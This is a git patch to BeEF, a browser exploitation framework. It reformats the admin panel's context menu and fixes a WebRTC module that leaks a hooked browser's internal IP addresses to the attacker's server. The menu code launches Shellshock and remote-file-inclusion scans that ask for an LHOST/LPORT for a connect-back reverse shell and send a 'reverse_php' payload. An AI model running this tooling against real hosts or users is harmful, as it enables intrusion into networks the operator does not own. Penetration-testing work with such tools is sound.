From 944ba747daa0a834b7152e2a5ead3d1e661156f9 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Thu, 5 Feb 2015 12:35:23 +0100 Subject: [PATCH] Fixed a bug in WebRTC command module, prevented duplicates in NetworkHost db table, removed unnecessary code. --- Gemfile | 2 +- config.yaml | 4 +- .../ui/panel/tabs/ZombieTabNetwork.js | 267 +++++++++--------- extensions/network/extension.rb | 2 - extensions/network/network.rb | 13 - .../host/get_internal_ip_webrtc/command.js | 9 +- modules/host/get_internal_ip_webrtc/module.rb | 8 +- 7 files changed, 153 insertions(+), 152 deletions(-) delete mode 100644 extensions/network/network.rb diff --git a/Gemfile b/Gemfile index 11297d839..36547f929 100644 --- a/Gemfile +++ b/Gemfile @@ -41,7 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension gem "rubyzip", ">= 1.0.0" gem "rubydns", "0.7.0" # DNS extension gem "geoip" # geolocation support -gem "dm-serializer" # network extension +gem "dm-serializer" # network extension # For running unit tests if ENV['BEEF_TEST'] diff --git a/config.yaml b/config.yaml index 50c772592..a390b6bb9 100644 --- a/config.yaml +++ b/config.yaml @@ -10,7 +10,7 @@ beef: # More verbose messages (server-side) debug: false # More verbose messages (client-side) - client_debug: false + client_debug: true # Used for generating secure tokens crypto_default_value_length: 80 @@ -33,7 +33,7 @@ beef: # NOTE: A poll timeout of less than 5,000 (ms) might impact performance # when hooking lots of browsers (50+). # Enabling WebSockets is generally better (beef.websocket.enable) - xhr_poll_timeout: 5000 + xhr_poll_timeout: 1000 # Reverse Proxy / NAT # If BeEF is running behind a reverse proxy or NAT diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js index 9dd47a21c..9effc1d18 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js @@ -30,8 +30,8 @@ ZombieTab_Network = function(zombie) { commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'"); } }); - return id; - } + return id; + }; /* * The panel that displays all identified network services grouped by host @@ -756,8 +756,6 @@ ZombieTab_Network = function(zombie) { sortInfo: {field: 'ip', direction: 'ASC'} }); - var req_pagesize = 50; - var services_panel_bbar = new Ext.PagingToolbar({ pageSize: req_pagesize, store: services_panel_store, @@ -811,131 +809,144 @@ ZombieTab_Network = function(zombie) { var ip = record.get('ip'); var port = record.get('port'); var proto = record.get('proto'); - grid.rowCtxMenu = new Ext.menu.Menu({ - items: [{ - text: 'Scan ('+ip+':'+port+'/'+proto+')', - iconCls: 'network-host-ctxMenu-host', - menu: { - xtype: 'menu', - items: [{ - text: 'Fingerprint HTTP', - iconCls: 'network-host-ctxMenu-fingerprint', - handler: function() { - var mod_id = get_module_id("internal_network_fingerprinting"); - commands_statusbar.update_sending('Fingerprinting ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - },{ - text: 'CORS Scan', - iconCls: 'network-host-ctxMenu-cors', - handler: function() { - var mod_id = get_module_id("cross_origin_scanner"); - commands_statusbar.update_sending('CORS scanning ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"ipRange":ip+'-'+ip, "ports":port}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - },{ - text: 'Shellshock Scan', - iconCls: 'network-host-ctxMenu-shellshock', - handler: function() { - var mod_id = get_module_id("shell_shock_scanner"); - var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); - if (!lhost) { - commands_statusbar.update_fail('Cancelled'); - return; - } - var lport = prompt("Enter local port for connect back shell:", 'LPORT'); - if (!lport) { - commands_statusbar.update_fail('Cancelled'); - return; - } - alert("Now start your reverse shell handler on " + lhost + ':' + lport); - commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - },{ - text: 'RFI Scan', - iconCls: 'network-host-ctxMenu-php', - handler: function() { - var mod_id = get_module_id("rfi_scanner"); - var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); - if (!lhost) { - commands_statusbar.update_fail('Cancelled'); - return; - } - var lport = prompt("Enter local port for connect back shell:", 'LPORT'); - if (!lport) { - commands_statusbar.update_fail('Cancelled'); - return; - } - alert("Now start your reverse shell handler on " + lhost + ':' + lport); - commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); - $jwterm.ajax({ - contentType: 'application/json', - data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}), - dataType: 'json', - type: 'POST', - url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, - async: false, - processData: false, - success: function(data){ - commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); - }, - error: function(){ - commands_statusbar.update_fail('Error sending command'); - } - }); - } - }] - } - }] - }); - grid.rowCtxMenu.showAt(e.getXY()); + grid.rowCtxMenu = new Ext.menu.Menu({ + items: [{ + text: 'Scan (' + ip + ':' + port + '/' + proto + ')', + iconCls: 'network-host-ctxMenu-host', + menu: { + xtype: 'menu', + items: [{ + text: 'Fingerprint HTTP', + iconCls: 'network-host-ctxMenu-fingerprint', + handler: function () { + var mod_id = get_module_id("internal_network_fingerprinting"); + commands_statusbar.update_sending('Fingerprinting ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }, { + text: 'CORS Scan', + iconCls: 'network-host-ctxMenu-cors', + handler: function () { + var mod_id = get_module_id("cross_origin_scanner"); + commands_statusbar.update_sending('CORS scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({"ipRange": ip + '-' + ip, "ports": port}), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }, { + text: 'Shellshock Scan', + iconCls: 'network-host-ctxMenu-shellshock', + handler: function () { + var mod_id = get_module_id("shell_shock_scanner"); + var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); + if (!lhost) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var lport = prompt("Enter local port for connect back shell:", 'LPORT'); + if (!lport) { + commands_statusbar.update_fail('Cancelled'); + return; + } + alert("Now start your reverse shell handler on " + lhost + ':' + lport); + commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({ + "rproto": proto, + "rhost": ip, + "rport": port, + "lhost": lhost, + "lport": lport + }), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }, { + text: 'RFI Scan', + iconCls: 'network-host-ctxMenu-php', + handler: function () { + var mod_id = get_module_id("rfi_scanner"); + var lhost = prompt("Enter local IP for connect back shell:", 'LHOST'); + if (!lhost) { + commands_statusbar.update_fail('Cancelled'); + return; + } + var lport = prompt("Enter local port for connect back shell:", 'LPORT'); + if (!lport) { + commands_statusbar.update_fail('Cancelled'); + return; + } + alert("Now start your reverse shell handler on " + lhost + ':' + lport); + commands_statusbar.update_sending('Shellshock scanning ' + ip + '...'); + $jwterm.ajax({ + contentType: 'application/json', + data: JSON.stringify({ + "rproto": proto, + "rhost": ip, + "rport": port, + "lhost": lhost, + "lport": lport, + "payload": "reverse_php" + }), + dataType: 'json', + type: 'POST', + url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token, + async: false, + processData: false, + success: function (data) { + commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully"); + }, + error: function () { + commands_statusbar.update_fail('Error sending command'); + } + }); + } + }] + } + }] + }); + grid.rowCtxMenu.showAt(e.getXY()); }, - afterrender: function(datagrid) { - datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} }); - } + afterrender: function (datagrid) { + datagrid.store.reload({params: {nonce: Ext.get("nonce").dom.value}}); + } } }); diff --git a/extensions/network/extension.rb b/extensions/network/extension.rb index f76877c19..1455caac6 100644 --- a/extensions/network/extension.rb +++ b/extensions/network/extension.rb @@ -17,11 +17,9 @@ end end end -require 'extensions/network/network' require 'extensions/network/models/network_host' require 'extensions/network/models/network_service' require 'extensions/network/api' require 'extensions/network/rest/network' - require 'dm-serializer' diff --git a/extensions/network/network.rb b/extensions/network/network.rb deleted file mode 100644 index 9a8eed9e2..000000000 --- a/extensions/network/network.rb +++ /dev/null @@ -1,13 +0,0 @@ -# -# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - http://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -module BeEF -module Extension -module Network - - -end -end -end diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js index 277591d05..572fa33db 100755 --- a/modules/host/get_internal_ip_webrtc/command.js +++ b/modules/host/get_internal_ip_webrtc/command.js @@ -22,7 +22,10 @@ beef.execute(function() { // Upon an ICE candidate being found // Grep the SDP data for IP address data rtc.onicecandidate = function (evt) { - if (evt.candidate) grepSDP(evt.candidate.candidate); + if (evt.candidate){ + console.log("a="+evt.candidate.candidate); + grepSDP("a="+evt.candidate.candidate); + } }; // Create an SDP offer @@ -30,12 +33,12 @@ beef.execute(function() { grepSDP(offerDesc.sdp); rtc.setLocalDescription(offerDesc); }, function (e) { beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed"); }); - + function processIPs(newAddr) { if (newAddr in addrs) return; else addrs[newAddr] = true; var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); - beef.debug("Found IPs: "+ displayAddrs.join(",")) + beef.debug("Found IPs: "+ displayAddrs.join(",")) beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(",")); } diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb index 9c516e87f..b51a60613 100755 --- a/modules/host/get_internal_ip_webrtc/module.rb +++ b/modules/host/get_internal_ip_webrtc/module.rb @@ -25,9 +25,11 @@ class Get_internal_ip_webrtc < BeEF::Core::Command next unless ip =~ /^[\d\.]+$/ next if ip =~ /^0\.0\.0\.0$/ next unless BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser has network interface #{ip}") - r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid) - r.save + if BeEF::Core::Models::NetworkHost.all(:ip => ip).empty? # prevent duplicates + print_debug("Hooked browser has network interface #{ip}") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :os => os, :cid => cid) + r.save + end end end end